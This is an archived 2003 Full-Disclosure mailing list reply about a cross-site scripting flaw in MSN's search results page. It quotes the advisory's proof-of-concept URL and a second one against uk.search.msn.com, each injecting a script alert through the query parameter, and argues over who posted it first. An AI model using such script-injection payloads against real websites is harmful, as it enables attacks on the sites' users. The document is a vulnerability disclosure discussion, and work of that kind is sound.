Re: [Full-Disclosure] [scip_Advisory 2003-01] MSN search results.aspx Cross Site Scripting

From: morning_wood (se_cur_ityat_private)
Date: Wed Jul 23 2003 - 02:02:40 PDT

  • Next message: Uffe Nielsen: "[VulnWatch] Buffer Overflow in Netware Web Server PERL Handler"

    > Exploit     http://search.msn.ch/results.aspx?srch=105&FORM=AS5&
    >             q=%3cscript%3ealert('test')%3b%3c%2fscript%3etest
    >             (URL is splitted into two parts; it doesn't work anymore)
    
    
    looks like ..
    http://uk.search.msn.com/results.aspx?q=%3Cscript%3Ealert%28%22sl0th+owj+j00r+arse%22%29%3C%2Fscript%3E&x=30&y=16&FORM=SMCRT
    
    posted on 0day by sl0th dated Tue Jun 10 22:35:53 BST 2003
    
    original link here ..
    http://nothackers.org/pipermail/0day/2003-June/000010.html  which did XSS
    at the time posted
    
    morning_wood
    http://nothackers.org
    
    
    _______________________________________________
    Full-Disclosure - We believe in it.
    Charter: http://lists.netsys.com/full-disclosure-charter.html
    



    This archive was generated by hypermail 2b30 : Wed Jul 23 2003 - 02:40:05 PDT